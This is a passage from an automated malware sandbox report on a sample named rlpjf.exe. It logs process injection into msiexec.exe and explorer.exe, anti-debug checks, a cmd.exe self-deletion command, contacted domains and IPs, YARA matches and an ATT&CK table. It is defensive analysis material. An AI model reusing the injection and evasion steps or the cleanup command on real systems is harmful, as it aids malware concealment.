          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FCC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05081608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0507FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0508AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0505FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_050446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05090EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05090EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05090EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FDEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0507FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05008EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_05098ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04FC58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FFF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FFF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FFF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_050469A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_050849A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_050849A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_050849A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_050849A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FE0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FE0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_050451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_050451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_050451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_050451BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FDB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FDB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FDB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FDB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_050541E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05047016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05047016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05047016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05094015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05094015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FCB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FCB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FCB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FFA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05082073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FEC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05091074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05043884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05043884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FCB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FCB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FCC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_050090AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FEB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FEB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0505B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0505B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FE4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FE4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FE4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FE4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FE4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0508131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FDAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FDAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FFFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05098B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FFD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FFD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0508138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0507D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05095BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_050453CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_050453CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FE3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FCAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FCAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FC5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FD8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FEDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0508AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0508AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05004A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05004A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05054257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0508EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0507B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0507B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_05098A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FFB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FD1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FD1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_0500927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FF3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FCDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FCF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 15_2_04FCDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Code function: 2_2_0040ACF0 LdrLoadDll,
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Code function: 1_2_001B14BB SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Code function: 1_2_001B14EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Code function: 2_2_001B14BB SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Code function: 2_2_001B14EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | Domain query: www.nzyyen.com
Source: C:\Windows\explorer.exe | Network Connect: 154.221.90.236 80
Source: C:\Windows\explorer.exe | Network Connect: 35.204.150.5 80
Source: C:\Windows\explorer.exe | Domain query: www.higginsuotdoors.com
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: FD0000
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Memory written: C:\Users\user\AppData\Local\Temp\rlpjf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Thread register set: target process: 3968
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Thread register set: target process: 3968
Source: C:\Windows\SysWOW64\msiexec.exe | Thread register set: target process: 3968
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Process created: C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\rlpjf.exe"
Source: explorer.exe, 00000003.00000000.281652753.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.324075506.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.360842490.0000000000688000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000003.00000000.365014333.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.361080485.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.281957486.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.361080485.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.281957486.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324444015.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.361080485.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.281957486.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324444015.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000000.281676164.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.308230377.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.324098848.000000000069D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000003.00000000.361080485.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.281957486.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324444015.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: WProgram Manager
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Code function: 1_2_001AFE73 cpuid
Source: C:\Users\user\AppData\Local\Temp\rlpjf.exe | Code function: 1_2_001B0FE8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Stealing of Sensitive Information

Source: Yara match | File source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

MITRE ATT&CK Matrix (numbers before a technique name are the report's own signature-count badges)

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | 12 Native API | 1 DLL Side-Loading | 612 Process Injection | 1 Rootkit | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot |
